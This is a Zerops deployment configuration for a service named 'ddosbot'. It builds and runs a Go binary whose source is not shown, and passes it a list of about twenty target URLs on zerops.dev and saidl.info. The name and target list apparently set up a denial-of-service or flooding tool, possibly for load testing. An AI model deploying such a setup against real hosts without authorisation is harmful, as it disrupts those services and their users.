zerops:
  - setup: ddosbot
    build: 
      os: alpine
      base: go@latest
      buildCommands:
        - go build main.go
      deployFiles: 
        - main
      cache: true
    run: 
      os: alpine
      base: alpine@latest
      envVariables:
        TARGET_URLS: https://api-e5-8080.app-tor1.zerops.dev,https://api-e0-8080.app-tor1.zerops.dev,https://api-f2-8080.app-tor1.zerops.dev,https://api-f5-8080.app-tor1.zerops.dev,https://api-da-8080.app-tor1.zerops.dev,https://tor1.saidl.info,https://api-ee-8080.app-tor1.zerops.dev,https://api-ec-8080.app-tor1.zerops.dev,https://api-e1-8080.app-tor1.zerops.dev,https://api-e7-8080.app-tor1.zerops.dev,https://api-e4-8080.app-tor1.zerops.dev,https://api-e3-8080.app-tor1.zerops.dev,https://tor1a.saidl.info,https://api-d9-8080.app-tor1.zerops.dev,https://api-e2-8080.app-tor1.zerops.dev,https://api-e6-8080.app-tor1.zerops.dev,https://api-f0-8080.app-tor1.zerops.dev,https://api-d8-8080.app-tor1.zerops.dev,https://api-e9-8080.app-tor1.zerops.dev,https://api-e8-8080.app-tor1.zerops.dev
      start: ./main
      
      
